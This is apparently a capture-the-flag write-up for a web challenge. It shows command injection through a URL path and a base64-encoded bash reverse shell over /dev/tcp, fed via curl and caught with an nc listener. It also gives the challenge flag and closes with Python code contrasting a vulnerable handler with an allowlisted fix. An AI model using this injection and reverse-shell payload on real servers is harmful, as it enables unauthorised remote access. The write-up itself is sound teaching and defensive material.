CrossCTF_2018: the Terminal

Category: Web

Points: 401

Description:

How long more can you stand it?


This challenge was really fun. First, opening the challenge page gives us a futuristic-looking terminal and some cryptic messages.


What do those mean? Looking at the browser's network console, we find requests to other URLs.


The output looks strangely like that of Unix's date command. Let's see if we can spoof that request and try something else, like ls.


Oh look, that's nice. Let's see if we can spawn a reverse shell and call it a day. Attempting an unescaped bash reverse shell proved fruitless, since / does not play nice with Flask, so we can base64-encode our command and pipe it through to bash on the server!

$ echo 'bash -i >& /dev/tcp/ 0>&1' | base64

Now that we have our payload, we can URL-encode the spaces in it and try to get our reverse shell:

$ curl '|%20base64%20-d%20|%20bash'

On our server side:

$ nc -nvlp 31337
listening on [any] 31337 ...
connect to [] from (UNKNOWN) [] 35774
bash: /root/.bashrc: Permission denied
theterminal@9d629bb237f6:/backend$

Woot! Let's see if we can get a flag!

$ nc -nvlp 31337
listening on [any] 31337 ...
connect to [] from (UNKNOWN) [] 35776
bash: /root/.bashrc: Permission denied
theterminal@9d629bb237f6:/backend$ cd /home
cd /home
theterminal@9d629bb237f6:/home$ ls
theterminal@9d629bb237f6:/home$ cd theterminal
cd theterminal
theterminal@9d629bb237f6:/home/theterminal$ ls
theterminal@9d629bb237f6:/home/theterminal$ cat the_flag_is_here_not_elsewhere
cat the_flag_is_here_not_elsewhere

Therefore, the flag is CrossCTF{C4ther1ne_zet4_j0n3s_w4s_1n_l0st_1n_tr4nsl4t1on}
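
The requests above only work because the URL path ends up in a shell. As an added example (not from the original write-up, and not the challenge's actual backend, which the page does not show), this Python code contrasts an assumed vulnerable handler with an allowlisted one; the function names, the ALLOWED table and the probe string are hypothetical.

```python
import subprocess
from urllib.parse import unquote

# Hypothetical allowlist: command name from the URL -> fixed argv.
# Nothing taken from the request ever becomes part of the command line.
ALLOWED = {"date": ["date"], "uptime": ["uptime"]}


def handle_unsafe(raw_segment: str) -> tuple[int, str]:
    """Assumed vulnerable pattern: the decoded URL segment is handed to a shell."""
    cmd = unquote(raw_segment)  # the web framework decodes %20 before the handler runs
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=5)
    return 200, proc.stdout


def handle_safe(raw_segment: str) -> tuple[int, str]:
    """Hardened form: exact-match lookup, fixed argv, no shell involved."""
    argv = ALLOWED.get(unquote(raw_segment))
    if argv is None:
        # Pipes, spaces, semicolons etc. never match a key, so they are rejected.
        return 404, "unknown command\n"
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=5)
    return 200, proc.stdout


if __name__ == "__main__":
    # Constructed, harmless probe with the same pipe-and-%20 shape as the write-up.
    probe = "date%20|%20echo%20INJECTED"
    print("unsafe:", handle_unsafe(probe))  # the shell interprets the pipe
    print("safe:  ", handle_safe(probe))    # rejected before anything runs
    print("safe:  ", handle_safe("date"))   # the one legitimate use still works
```

Running the container as a non-root user, as this challenge did, limits what a shell can reach but does not remove the injection; the allowlist does.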

